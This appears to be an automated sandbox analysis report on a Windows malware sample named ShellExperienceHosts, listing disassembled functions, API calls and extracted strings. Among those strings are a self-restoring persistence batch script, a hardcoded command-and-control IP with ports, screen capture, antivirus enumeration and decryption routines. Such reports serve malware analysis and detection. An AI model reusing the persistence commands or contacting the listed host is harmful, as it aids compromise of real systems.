Failed to create backup EXE. Please check the EXE path: , xrefs: 6C9A7D4A
\monitor.bat, xrefs: 6C9A734C, 6C9A797F
IOVA, xrefs: 6C9A7466, 6C9A7BCA, 6C9A845B
\backup.exe", xrefs: 6C9A7569
echo DLL file not found, restoring from backup..., xrefs: 6C9A7870
tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul, xrefs: 6C9A78A0
timeout /t 30 /nobreak >nul, xrefs: 6C9A78E0
if not exist "%ProcessPath%" (, xrefs: 6C9A7820
\backup.exe, xrefs: 6C9A7C4C
copy /Y "%BackupProcessPath%" "%ProcessPath%", xrefs: 6C9A7840
set "BackupDLLPath=, xrefs: 6C9A76B1
Failed to create backup DLL. Please check the DLL path: , xrefs: 6C9A7BD5
:CheckProcess, xrefs: 6C9A7491
set "ProcessName=, xrefs: 6C9A74A1
goto CheckProcess, xrefs: 6C9A78F0
monitor.pid, xrefs: 6C9A7E1C, 6C9A8039
echo Process file not found, restoring from backup..., xrefs: 6C9A7830
set "DLLPath=, xrefs: 6C9A767E
if %ERRORLEVEL% neq 0 (, xrefs: 6C9A78B0
@echo off, xrefs: 6C9A7481
copy /Y "%BackupDLLPath%" "%DLLPath%", xrefs: 6C9A7880
start "" "%ProcessPath%", xrefs: 6C9A78C0
if not exist "%DLLPath%" (, xrefs: 6C9A7860

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_$CloseHandle$CopyFileProcess$Concurrency::cancel_current_taskCreateOpenPathTemp
String ID: copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $IOVA$\backup.dll$\backup.dll"$\backup.exe$\backup.exe"$\monitor.bat$cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($monitor.pid$set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul
API String ID: 2226957352-921174979
Opcode ID: ae2704a5abc12dbe0a9e352be33ac1b49cb589a0eaecfbf473c0e6cd83e35be9
Instruction ID: 7ac27c146045c50caec260a9067172f479d39b2ea046c3f8a76def6987e22e5e
Opcode Fuzzy Hash: ae2704a5abc12dbe0a9e352be33ac1b49cb589a0eaecfbf473c0e6cd83e35be9
Instruction Fuzzy Hash: C6B2D670D002488FDB14CFA4C995BEDBBB5BF55308F148299D409ABA51EB70DB8ACF91

Function 02B90032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 02B904AE
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 02B904DE

Strings

A, xrefs: 02B90244
Via, xrefs: 02B90312
st, xrefs: 02B901AD
Lo, xrefs: 02B900FC
ee, xrefs: 02B900F0
ctio, xrefs: 02B9026B
Rt, xrefs: 02B90233
tNat, xrefs: 02B9020A
t, xrefs: 02B90187
Vi, xrefs: 02B9012C
G, xrefs: 02B90205
a, xrefs: 02B9016D
iv, xrefs: 02B90212
P, xrefs: 02B90176
a, xrefs: 02B90103
yA, xrefs: 02B90125
Syst, xrefs: 02B90219
ucti, xrefs: 02B901BE
a, xrefs: 02B9013E
oc, xrefs: 02B90154
fo, xrefs: 02B9022C
Li, xrefs: 02B9010C
tu, xrefs: 02B90137
Cach, xrefs: 02B901FA
ushI, xrefs: 02B9019B
otec, xrefs: 02B9017F
a, xrefs: 02B9011C
o, xrefs: 02B901C9
F, xrefs: 02B9018C
A, xrefs: 02B90147
p, xrefs: 02B900F7
mI, xrefs: 02B90221
Fu, xrefs: 02B9025A
tu, xrefs: 02B90166
S, xrefs: 02B900E7
b, xrefs: 02B90113
b, xrefs: 02B90287
Ta, xrefs: 02B9027D

Memory Dump Source

Source File: 00000003.00000002.3535170617.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b90000_ShellExperienceHosts.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
API String ID: 2032221330-2899676511
Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
Instruction ID: b9e16e83c021b63079b917ee95ff6d18ab33a583d639c1477ef0663b437b0760
Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
Instruction Fuzzy Hash: DA628C715083858FDB20DF24C880BABBBE5FF95704F044C6DE9C99B251E774A988CB96

Function 032DDF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354
sleepregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032E0542: __fassign.LIBCMT ref: 032E0538

Sleep.KERNEL32(00000000), ref: 032DDF64
CloseHandle.KERNEL32(00000000), ref: 032DDF91
GetLocalTime.KERNEL32(?), ref: 032DDFA9
wsprintfW.USER32 ref: 032DDFE0
SetUnhandledExceptionFilter.KERNEL32(032D75B0), ref: 032DDFEE
CloseHandle.KERNEL32(00000000), ref: 032DE007

Part of subcall function 032DF707: _malloc.LIBCMT ref: 032DF721

EnumWindows.USER32(032D5CC0,?), ref: 032DE19D
Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 032DE1AA
EnumWindows.USER32(032D5CC0,?), ref: 032DE1BE
Sleep.KERNEL32(00000BB8), ref: 032DE1F5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 032DE241
Sleep.KERNEL32(00000FA0), ref: 032DE2C4
RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 032DE2EB
RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 032DE30B
CloseHandle.KERNEL32(?), ref: 032DE35D
Sleep.KERNEL32(000003E8,?,?), ref: 032DE3A4
WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 032DE3D0
CloseHandle.KERNEL32(?,?,?), ref: 032DE3D7
Sleep.KERNEL32(000003E8,?,?), ref: 032DE3E2
CloseHandle.KERNEL32(?), ref: 032DE400
WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 032DE425
CloseHandle.KERNEL32(?,?,?), ref: 032DE42C
Sleep.KERNEL32(00000000,?,?,?), ref: 032DE446
CloseHandle.KERNEL32(?), ref: 032DE464

Strings

17094, xrefs: 032DE0D0
IpDatespecial, xrefs: 032DE305
17093, xrefs: 032DE08F, 032DE0D7, 032DE135, 032DE1CE, 032DE20C
156.251.17.243, xrefs: 032DE0B9
156.251.17.243, xrefs: 032DE117
17095, xrefs: 032DE12E
%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 032DDFDA
156.251.17.243, xrefs: 032DE07B, 032DE0C3, 032DE121, 032DE1E5, 032DE253
17093, xrefs: 032DE088
Console, xrefs: 032DE2D5
156.251.17.243, xrefs: 032DE071

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$156.251.17.243$156.251.17.243$156.251.17.243$156.251.17.243$17093$17093$17094$17095$Console$IpDatespecial
API String ID: 1511462596-327302196
Opcode ID: ff795002f689d428511e88c0a1df37eb0f3f0e7cee02ac1e39db653334981540
Instruction ID: 159dc2788f920d0f72849ed853fefc16daecfc811af0f0b793ea78f169dc7b36
Opcode Fuzzy Hash: ff795002f689d428511e88c0a1df37eb0f3f0e7cee02ac1e39db653334981540
Instruction Fuzzy Hash: 88D105B4954301EFD320EF64EC89F2EB7A8FB85B14F108A2DF1559A294D7B09484CB93

Function 032DBC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDesktopWindow.USER32 ref: 032DBC8F
GetDC.USER32(00000000), ref: 032DBC9C
CreateCompatibleDC.GDI32(00000000), ref: 032DBCA2
GetDC.USER32(00000000), ref: 032DBCAD
GetDeviceCaps.GDI32(00000000,00000008), ref: 032DBCBA
GetDeviceCaps.GDI32(00000000,00000076), ref: 032DBCC2
ReleaseDC.USER32(00000000,00000000), ref: 032DBCD3
GetSystemMetrics.USER32(0000004E), ref: 032DBCF8
GetSystemMetrics.USER32(0000004F), ref: 032DBD26
GetSystemMetrics.USER32(0000004C), ref: 032DBD78
GetSystemMetrics.USER32(0000004D), ref: 032DBD8D
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 032DBDA6
SelectObject.GDI32(?,00000000), ref: 032DBDB4
SetStretchBltMode.GDI32(?,00000003), ref: 032DBDC0
GetSystemMetrics.USER32(0000004F), ref: 032DBDCD
GetSystemMetrics.USER32(0000004E), ref: 032DBDE0
StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 032DBE07
_memset.LIBCMT ref: 032DBE7A
GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 032DBE97
_memset.LIBCMT ref: 032DBEAF

Part of subcall function 032DF707: _malloc.LIBCMT ref: 032DF721

DeleteObject.GDI32(?), ref: 032DBF23
DeleteObject.GDI32(?), ref: 032DBF2D
ReleaseDC.USER32(00000000,?), ref: 032DBF39
DeleteObject.GDI32(?), ref: 032DBFDF
DeleteObject.GDI32(?), ref: 032DBFE9
ReleaseDC.USER32(00000000,?), ref: 032DBFF5

Strings

(, xrefs: 032DBE3E
gfff, xrefs: 032DBD10
gfff, xrefs: 032DBD38
6, xrefs: 032DBE61

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
String ID: ($6$gfff$gfff
API String ID: 3293817703-713438465
Opcode ID: cde74cda7a42c392e5348be3f13f4069f5d43b61d7c54058bc16d4bb988b020b
Instruction ID: 1274bc3d0d3f03366b86c298b0152add2529a1a5a618fec0d7d78e4debaaa70e
Opcode Fuzzy Hash: cde74cda7a42c392e5348be3f13f4069f5d43b61d7c54058bc16d4bb988b020b
Instruction Fuzzy Hash: BAD19DB5D01308EFDB10EFE9E885A9EBBB9FF48700F148529F505AB240D7B0A945CB91

Function 032D6A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(75BF73E0), ref: 032D6A94
wsprintfW.USER32 ref: 032D6AA7

Part of subcall function 032D6910: GetCurrentProcessId.KERNEL32(5943C5A2,00000000,00000000,75BF73E0,?,00000000,032F10DB,000000FF,?,032D6AB3,00000000), ref: 032D6938
Part of subcall function 032D6910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,032F10DB,000000FF,?,032D6AB3,00000000), ref: 032D6947
Part of subcall function 032D6910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,032F10DB,000000FF,?,032D6AB3,00000000), ref: 032D6960
Part of subcall function 032D6910: CloseHandle.KERNEL32(00000000,?,00000000,032F10DB,000000FF,?,032D6AB3,00000000), ref: 032D696B

_memset.LIBCMT ref: 032D6AC2
GetVersionExW.KERNEL32(?), ref: 032D6ADB
GetCurrentProcess.KERNEL32(00000008,?), ref: 032D6B12
OpenProcessToken.ADVAPI32(00000000), ref: 032D6B19
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 032D6B3F
GetLastError.KERNEL32 ref: 032D6B49
LocalAlloc.KERNEL32(00000040,?), ref: 032D6B5D
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 032D6B85
GetSidSubAuthorityCount.ADVAPI32 ref: 032D6B98
GetSidSubAuthority.ADVAPI32(00000000), ref: 032D6BA6
LocalFree.KERNEL32(?), ref: 032D6BB5
CloseHandle.KERNEL32(?), ref: 032D6BC2
wsprintfW.USER32 ref: 032D6C1B

Strings

None/%s, xrefs: 032D6BE7
NO/, xrefs: 032D6BDF
-N/, xrefs: 032D6BEF

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
String ID: -N/$NO/$None/%s
API String ID: 3036438616-3095023699
Opcode ID: 2980029004a027252c84c6e28df4f82b1ed98dc4833f4ba58119d5117b4878f5
Instruction ID: f4d6ea98bf4dd9dd1888774284760251546f025ec6c460d11e51f3cc8c7b7727
Opcode Fuzzy Hash: 2980029004a027252c84c6e28df4f82b1ed98dc4833f4ba58119d5117b4878f5
Instruction Fuzzy Hash: DC41E275A10319AFDB20EB60ED8CFEEB778EB0A710F4484A9F605A6145DA74D9D0CF60

Function 6C9A6440 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 99
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C9A6499
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,00000000,00000000,00000000), ref: 6C9A6517

Strings

Failed to hash data., xrefs: 6C9A6882
Failed to decode base64 string., xrefs: 6C9A651D
`nIu, xrefs: 6C9A6484, 6C9A64E9
Failed to set IV., xrefs: 6C9A6A5A
Failed to create hash object., xrefs: 6C9A684C
wi65, xrefs: 6C9A698B
ed__, xrefs: 6C9A6924
Failed to get hash length., xrefs: 6C9A683A
Failed to import key., xrefs: 6C9A6A28
Failed to calculate base64 decoded size., xrefs: 6C9A6537
Failed to decrypt data., xrefs: 6C9A6B20
Failed to get hash value., xrefs: 6C9A681F
Failed to acquire cryptographic context., xrefs: 6C9A6CC2
Salt, xrefs: 6C9A691C
Failed to set cipher mode., xrefs: 6C9A6A90

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: BinaryCryptString
String ID: Failed to acquire cryptographic context.$Failed to calculate base64 decoded size.$Failed to create hash object.$Failed to decode base64 string.$Failed to decrypt data.$Failed to get hash length.$Failed to get hash value.$Failed to hash data.$Failed to import key.$Failed to set IV.$Failed to set cipher mode.$Salt$`nIu$ed__$wi65
API String ID: 80407269-2452840022
Opcode ID: cc5dab012dbc62073df39200191b7c39b7c258a677afd5efe563c037c51626a7
Instruction ID: a328146f64f155d6dc09543611398a78271f1ce2940a5e16aa3a06f338b05eec
Opcode Fuzzy Hash: cc5dab012dbc62073df39200191b7c39b7c258a677afd5efe563c037c51626a7
Instruction Fuzzy Hash: BB317171A00219ABDB10CF98CC81B9EBBB8AB05714F244529E514EBB84D774E945CBA1

Function 032D6150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222
stringcomregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 032D618B
lstrcatW.KERNEL32(03301F10,032F510C,?,5943C5A2,00000AD4,00000000,75BF73E0), ref: 032D61CD
lstrcatW.KERNEL32(03301F10,032F535C,?,5943C5A2,00000AD4,00000000,75BF73E0), ref: 032D61D9
CoCreateInstance.OLE32(032F2480,00000000,00000017,032F578C,?,?,5943C5A2,00000AD4,00000000,75BF73E0), ref: 032D6220
_memset.LIBCMT ref: 032D62CE
wsprintfW.USER32 ref: 032D6336
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 032D635F
_memset.LIBCMT ref: 032D6376

Part of subcall function 032D6050: _memset.LIBCMT ref: 032D607C
Part of subcall function 032D6050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 032D6088

Strings

Windows Defender IOfficeAntiVirus implementation , xrefs: 032D6186, 032D61C8, 032D61D4, 032D63C9, 032D63D5, 032D6422, 032D6436, 032D645A
CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 032D6330

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
API String ID: 1221949200-1583895642
Opcode ID: b148fe5f2f442fa158ce4ab65b76779a88323903f144e6718f6115ad5b085b9e
Instruction ID: 89ff589d1d9877d3e6a2c30d1e221b166daf59cc4ad19fbdd03203024dd0d4c2
Opcode Fuzzy Hash: b148fe5f2f442fa158ce4ab65b76779a88323903f144e6718f6115ad5b085b9e
Instruction Fuzzy Hash: 2781D6B5A10228AFDB20DB54DC84FAEB778EB49704F444198F708A7141D7B0AEC0CF64

Function 032D7490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,032D5611,0000035E,000002FA), ref: 032D749C
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 032D74B2
swprintf.LIBCMT ref: 032D74EF

Part of subcall function 032D7410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,032D7523), ref: 032D743D
Part of subcall function 032D7410: GetProcAddress.KERNEL32(00000000), ref: 032D7444
Part of subcall function 032D7410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,032D7523), ref: 032D7452

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 032D7547
RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 032D7563
RegCloseKey.KERNEL32(000002FA), ref: 032D7586
FreeLibrary.KERNEL32(00000000,?,?,?,032D5611,0000035E,000002FA), ref: 032D7598

Strings

%d.%d.%d, xrefs: 032D74E7
RtlGetNtVersionNumbers, xrefs: 032D74AC
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 032D753D
ProductName, xrefs: 032D755D
ntdll.dll, xrefs: 032D7497

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 2158625971-3190923360
Opcode ID: f7d83ac98c8e9abfc44e58735e4cabb1f705951446aca55c3852564e7d682b78
Instruction ID: ba962266b0d88a815aa4d3fbcd95b42083e0ddb71cf1a270f5cf8df676fe4943
Opcode Fuzzy Hash: f7d83ac98c8e9abfc44e58735e4cabb1f705951446aca55c3852564e7d682b78
Instruction Fuzzy Hash: C531D676A10309BFD714EBA8DD45EBFBB7CDB48700F144428BA06A6185E674DA40C761

Function 032D80F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 032D8132
lstrcmpiW.KERNEL32(?,A:\), ref: 032D8166
lstrcmpiW.KERNEL32(?,B:\), ref: 032D8176
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 032D81A6
lstrlenW.KERNEL32(?), ref: 032D81B7
__wcsnicmp.LIBCMT ref: 032D81CE
lstrcpyW.KERNEL32(00000AD4,?), ref: 032D8204
lstrcpyW.KERNEL32(?,?), ref: 032D8228
lstrcatW.KERNEL32(?,00000000), ref: 032D8233

Strings

B:\, xrefs: 032D8170
A:\, xrefs: 032D8160

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
String ID: A:\$B:\
API String ID: 950920757-1009255891
Opcode ID: 60f34411f65401cc15b902a1c0b1ac18f0d678ad187d5c7c4a7ca0a6d944461f
Instruction ID: 5bb8e2940a9cc877f715879946e53c531934cb665fbe26ef06a0fa197f17a0e5
Opcode Fuzzy Hash: 60f34411f65401cc15b902a1c0b1ac18f0d678ad187d5c7c4a7ca0a6d944461f
Instruction Fuzzy Hash: CB41D875A11319DFDB20EF64ED84AEEB37CEF44710F0444A9DA0AA7144E770DA45CB94

Function 032D6790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 032D5320: InterlockedDecrement.KERNEL32(00000008), ref: 032D536F
Part of subcall function 032D5320: SysFreeString.OLEAUT32(00000000), ref: 032D5384
Part of subcall function 032D5320: SysAllocString.OLEAUT32(032F5148), ref: 032D53D5

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,032F5148,032D69A4,032F5148,00000000,75BF73E0), ref: 032D67F4
GetLastError.KERNEL32 ref: 032D67FE
GetProcessHeap.KERNEL32(00000008,?), ref: 032D6816
HeapAlloc.KERNEL32(00000000), ref: 032D681D
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 032D683F
LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 032D6871
GetLastError.KERNEL32 ref: 032D687B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 032D68E6
HeapFree.KERNEL32(00000000), ref: 032D68ED

Strings

NONE_MAPPED, xrefs: 032D6888

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
String ID: NONE_MAPPED
API String ID: 1317816589-2950899194
Opcode ID: 84d860bdafdb075c2bdf053d8763f742c352ea84cecf9a33074300048dbab563
Instruction ID: 15cd4e01cfb0d4c11c37742988cd1af2e1bdb05f0ebf03ab9fe38e21ba9c3d8f
Opcode Fuzzy Hash: 84d860bdafdb075c2bdf053d8763f742c352ea84cecf9a33074300048dbab563
Instruction Fuzzy Hash: 6E4186B5910319AFD710EB64ED48FAEB37CEB85701F5084ACE609E7140DBB09AC98F65

Function 032D6C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 032D6C8B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 032D6CAA
_memset.LIBCMT ref: 032D6CE1
GlobalMemoryStatusEx.KERNEL32(?), ref: 032D6CF4
swprintf.LIBCMT ref: 032D6D39
swprintf.LIBCMT ref: 032D6D4C

Strings

%sFree%d Gb , xrefs: 032D6D41
@, xrefs: 032D6CED
:, xrefs: 032D6C80
HDD:%d, xrefs: 032D6D2E

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
String ID: %sFree%d Gb $:$@$HDD:%d
API String ID: 3202570353-3501811827
Opcode ID: 08c8266c80abcee5d6a5f6f71083be83e392cca3120accaf5624b434a689a875
Instruction ID: a578edeea19b21bc72a51de2798f9626afe359195c18fd97850310f425da53e3
Opcode Fuzzy Hash: 08c8266c80abcee5d6a5f6f71083be83e392cca3120accaf5624b434a689a875
Instruction Fuzzy Hash: 4F316DB6E1020CABDB10DFE5DC45BEEB7B9FB48700F50821DE91AAB241E6706945CB94

Function 032D6EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON

Download Yara Rule

APIs

CreateDXGIFactory.DXGI(032F579C,?,5943C5A2,74DEDF80,00000000,75BF73E0), ref: 032D6F4A
swprintf.LIBCMT ref: 032D711E
std::_Xinvalid_argument.LIBCPMT ref: 032D71C7

Strings

%s%s %d*%d , xrefs: 032D7337
%s%s %d %d , xrefs: 032D7113
vector<T> too long, xrefs: 032D71C2

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CreateFactoryXinvalid_argumentstd::_swprintf
String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
API String ID: 3803070356-257307503
Opcode ID: 0b5a2dbb476762dc024b7b45a22c2bb880a19c81e3c3c992982bdd21f3de928c
Instruction ID: adaa5d7bf3850ad46b69c5134cfeee824943c71a38f7ba25a9f0ae0a672a8da8
Opcode Fuzzy Hash: 0b5a2dbb476762dc024b7b45a22c2bb880a19c81e3c3c992982bdd21f3de928c
Instruction Fuzzy Hash: B7E16671E102659FDF24CE68CC80BEEB375AF45700F1846E9D95AAB284D770AEC18F91

